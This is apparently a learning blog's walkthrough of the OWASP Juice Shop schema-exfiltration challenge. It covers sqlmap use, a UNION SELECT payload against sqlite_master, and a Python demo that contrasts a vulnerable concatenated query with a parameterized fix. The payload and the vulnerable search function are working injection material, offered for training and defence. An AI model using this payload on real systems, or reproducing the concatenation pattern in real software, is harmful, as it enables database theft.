Name: Database Schema
Description: Exfiltrate the entire DB schema definition via SQL injection.
Difficulty: 3 star
Expanded Description: https://pwning.owasp-juice.shop/part2/injection.html
Burp, FoxyProxy, sqlmap
SQL Injection Payload Wordlist
OWASP SQL Injection Documentation
OWASP SQL Injection Bypassing WAF
SQL injection is still a topic I need to gain a better grasp on. While I’ve taken courses where I’ve planned, diagrammed, and built databases, studied relational algebra, and written SQL queries, I’m more than a little rusty at it. That fact, coupled with a desire to become more comfortable with the tools available to me in Kali Linux, led to using sqlmap for my first attempt at solving this problem. From previous challenges (DOM XSS) I knew that there was no input sanitization on the “Search” field, so I decided to start there.
As sqlmap has differing levels of intensity (its --level and --risk options govern how many payloads it tries and how noisy and potentially harmful they are to the target system), and because I'm running the application in Docker, I decided there was no real point in being quiet. So I set the program to be exceedingly thorough in its search of that input field.
What do you know? It’s vulnerable! OK, so now to extract the database schema and finish off this challenge.
But there was no completion alert. It wasn’t difficult to figure out that OWASP hadn’t set up this challenge simply to test my sqlmap skills, so I began reading up on how to craft a UNION SELECT attack through the address bar. Thanks to the sqlmap results, I knew there were 21 different tables to enumerate, but beyond that I was a little lost.
OK, a lot lost. After deciphering error after error, I narrowed down the number of columns I actually needed to match in my UNION SELECT to nine rather than 21. Knowing I was close, however, didn't make this easier. Ultimately I gave in and read the solution. Had I replaced '1' with 'sql' in my final query, it would have worked: Juice Shop runs on SQLite, and sql is the column of sqlite_master that holds each table's CREATE statement, so selecting the literal 1 in that position returns a column of ones instead of the schema. Horseshoes and hand grenades, I suppose.
Because I had already used sqlmap and knew it worked, once I had completed this challenge I went back and dumped the entire database to a text file, formatted that file for easy reading, and stored it for later use. The more I know about the system in general, and the database contents specifically, the more easily I'll be able to solve future challenges.
Prevention and mitigation strategies:
Sanitize input fields! More to the point, never build SQL by concatenating user input into the query string. Use parameterized queries (prepared statements) so the database driver binds the search term as data, and the ')) and UNION SELECT above never reach the SQL parser as syntax. Input validation and a least-privilege database account are defence in depth, not the fix.
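To make both halves of this concrete, the UNION SELECT against sqlite_master described above and the parameterized fix, here is an added example that is not Juice Shop's code or part of the original walkthrough. It builds an in-memory SQLite database with a toy nine-column Products table (constructed sample data, chosen to match the column count I ended up with), a search function that splices the query into SQL the way the vulnerable endpoint does, and the same search done with bound parameters. The query shape is an assumption modelled on the product search, not copied from it.

```python
"""Added example: SQL injection against a SQLite search, and the fix.

Not Juice Shop's code. The Products table, rows and query shape are
constructed stand-ins chosen to mirror the challenge, not copied from it.
"""
import sqlite3

# Constructed sample schema: Products has nine columns, plus a second table
# so the exfiltrated schema shows more than one CREATE statement.
SCHEMA = """
CREATE TABLE Products (
    id INTEGER PRIMARY KEY,
    name TEXT, description TEXT, price REAL, deluxePrice REAL,
    image TEXT, createdAt TEXT, updatedAt TEXT, deletedAt TEXT
);
CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT);
INSERT INTO Products VALUES (1,'Apple Juice','fresh',1.99,0.99,'a.jpg','2020','2020',NULL);
INSERT INTO Products VALUES (2,'Banana Juice','ripe',2.49,1.49,'b.jpg','2020','2020',NULL);
"""


def connect():
    """Fresh in-memory database loaded with the sample schema and rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, q):
    """String concatenation: the user's text becomes part of the SQL itself."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE '%" + q
           + "%' OR description LIKE '%" + q
           + "%') AND deletedAt IS NULL) ORDER BY name")
    return conn.execute(sql).fetchall()


def search_safe(conn, q):
    """Parameterized query: the driver binds q as data, never as syntax."""
    sql = ("SELECT * FROM Products WHERE ((name LIKE ? OR description LIKE ?) "
           "AND deletedAt IS NULL) ORDER BY name")
    pattern = "%" + q + "%"
    return conn.execute(sql, (pattern, pattern)).fetchall()


# The payload: close the two open parentheses, UNION a nine-column row whose
# first column is the CREATE statement stored in sqlite_master.sql, and
# comment out the rest of the original query. With a literal '1' in place
# of sql the query still runs, but returns ones instead of the schema.
SCHEMA_PAYLOAD = (
    "qwert')) UNION SELECT sql, '2', '3', '4', '5', '6', '7', '8', '9' "
    "FROM sqlite_master--"
)


def exfiltrate_schema(conn):
    """Return every CREATE statement the injected query pulls out."""
    rows = search_vulnerable(conn, SCHEMA_PAYLOAD)
    # No product matches 'qwert', so every row is a unioned sqlite_master
    # row. Some sqlite_master entries (auto-indexes) carry a NULL sql.
    return [row[0] for row in rows if row[0] is not None]


if __name__ == "__main__":
    db = connect()
    print("normal search:", search_vulnerable(db, "Apple"))
    for stmt in exfiltrate_schema(db):
        print("leaked:", stmt.replace("\n", " "))
    print("same payload, parameterized:", search_safe(db, SCHEMA_PAYLOAD))
```

Run it and the vulnerable path prints both CREATE TABLE statements, while the parameterized path treats the whole payload as a product name and matches nothing. The nine placeholder values after sql are what the column-count guessing in the walkthrough was about: a UNION with the wrong number of columns is a syntax error, which is why the error messages narrowed the count down before the schema ever appeared.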
Lessons Learned and Things Worth Mentioning:
- When I started writing these walkthroughs I pointed out that I would be using this series to learn, not to demonstrate mastery. It’s not my favorite thing in the world to admit defeat, but sometimes the best way to learn something is to see it done properly and try to understand why it works the way it does. Beating your head against the wall is only so effective.